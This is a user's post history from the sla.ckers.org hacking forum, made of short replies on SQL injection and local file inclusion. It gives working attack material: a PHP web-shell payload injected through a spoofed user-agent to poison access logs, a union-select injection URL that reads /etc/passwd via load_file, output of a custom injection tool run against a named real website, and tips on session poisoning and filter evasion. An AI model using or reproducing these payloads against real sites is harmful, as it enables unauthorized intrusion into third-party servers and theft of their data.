Sla.ckers.org
2 years ago
alexfoo
I've been meaning to answer this thread for a while. /proc/self/environ is no more. I don't know if it's removed from the mainline kernel, but Debian and Ubuntu at least don't have the file any more. There are other ways to turn LFI into RCE. Try including the access_log after you've accessed any file with your user-agent spoofed to '<?php system($_GET); ?>' or something. Be creative! Ther
Forum: SQL and Code Injection
3 years ago
alexfoo
You have two options: 1 (least likely): Find a way to set the username in your session. 2 (also not very likely): local session poisoning: http://ha.xxor.se/2011/09/local-session-poisoning-in-php-part-1.html http://ha.xxor.se/2011/09/local-session-poisoning-in-php-part-2.html http://ha.xxor.se/2011/09/local-session-poisoning-in-php-part-3.html Have fun.
Forum: SQL and Code Injection
3 years ago
alexfoo
Can't sqlmap help you? It does Postgres if I remember correctly.
Forum: SQL and Code Injection
3 years ago
alexfoo
It is probably some kind of one-way crypto, stored in a binary format of eight bits. DES perhaps?
Forum: SQL and Code Injection
3 years ago
alexfoo
If lower() and upper() work, so should unhex().
Forum: SQL and Code Injection
4 years ago
alexfoo
It is not possible to do SQLi on that URL. Maybe on the site, but not there.
Forum: SQL and Code Injection
4 years ago
alexfoo
Maybe the colon (:) is the problem. It's usually filtered to avoid data://.
Forum: SQL and Code Injection
4 years ago
alexfoo
I'm only guessing here, but maybe the .php file needs +x to be executed by the webserver. The webserver version is "Apache/Nginx/Varnish", which seems pretty unusual.
Forum: SQL and Code Injection
4 years ago
alexfoo
It is unpossible to call load_file without parentheses. Your only hope is if you can urlencode the () to %28 and %29.
Forum: SQL and Code Injection
4 years ago
alexfoo
' starts a string, and a string is not executed as a query. But why do you fuck around with substring and stuff if it's not a blind injection?
Forum: SQL and Code Injection
4 years ago
alexfoo
/etc/shadow is only readable by root; mysqld is run by nobody (or a similar low-privilege user).
Forum: Full Disclosure
4 years ago
alexfoo
I got tired of doing the same kind of checks to all pages I find vulnerable, so I hacked together a little script to do some stuff for me. $ perl sqlfu.pl "http://www.helsingborgsutstallningar.se/page.asp?id=-1%20union%20select%201,2,,4,5,6,7,8" SQLfU Version: 5.0.22-community-nt User: root@localhost Found table |ads|Id,filename,itext,url,itext_eng|int,varchar,text,varchar,text|
Forum: SQL and Code Injection
4 years ago
alexfoo
Regarding the last post: the page probably uses the id= parameter in two different queries with different numbers of columns in the result. But I'm just guessing.
Forum: SQL and Code Injection
4 years ago
alexfoo
My guess is that the code looks kinda like this: $res = mysql_query( "select url from foo where id = ".$_GET['id'] ); $row = mysql_fetch_array( $res ); header( "Location: ".$row['url'] );
Forum: SQL and Code Injection
4 years ago
alexfoo
Looks like pizzamarketplace fixed their shit, but I'll try to answer anyway. a) My guess is that you got an error saying something about a mismatched ', causing the guy who discovered this to think the site did not properly scrub the input. My guess is that the query looked like this: SELECT * FROM foo WHERE bice = $_GET b) The t parameter is useless. c) Can't get this to work, but yes, it
Forum: SQL and Code Injection
4 years ago
alexfoo
Is it just me or are most of the vuln sites in .br? :p
Forum: SQL and Code Injection
4 years ago
alexfoo
@Reiners: That's what I thought, thanks :-)
Forum: SQL and Code Injection
4 years ago
alexfoo
@hc0de: Just the stuff I was looking for, thanks :-)
Forum: SQL and Code Injection
4 years ago
alexfoo
hai, I found a page that lets me include everything I want, as long as it does not contain the string '../'. '..', '/' and './' work. Suggestions on how I can solve this puzzle? Impossible? TIA
Forum: SQL and Code Injection
4 years ago
alexfoo
hai, I'm trying out some SQL injections but I'm having trouble with load_file(). Has it become common practice to block load_file on the SQL server, or am I doing something wrong? This is what I use: /index.php?page=news&id=168%20and%201=2%20union%20select%201,2,3,4,5,load_file(0x2F6574632F706173737764),7,8,9,10,11 I tried load_file('/etc/passwd') but that gave me a PHP error the s
Forum: SQL and Code Injection
4 years ago
alexfoo
I usually try to find temporary files that editors leave behind, like foo.php~ and stuff like that. Or try to find an LFI.
Forum: Full Disclosure